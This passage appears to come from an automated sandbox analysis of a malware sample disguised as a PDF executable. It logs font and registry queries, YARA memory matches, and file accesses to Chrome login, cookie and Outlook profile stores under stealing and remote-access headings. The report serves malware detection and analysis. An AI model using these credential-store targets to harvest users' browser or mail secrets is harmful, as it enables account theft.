Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Remote Access Functionality

Source: Yara match File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY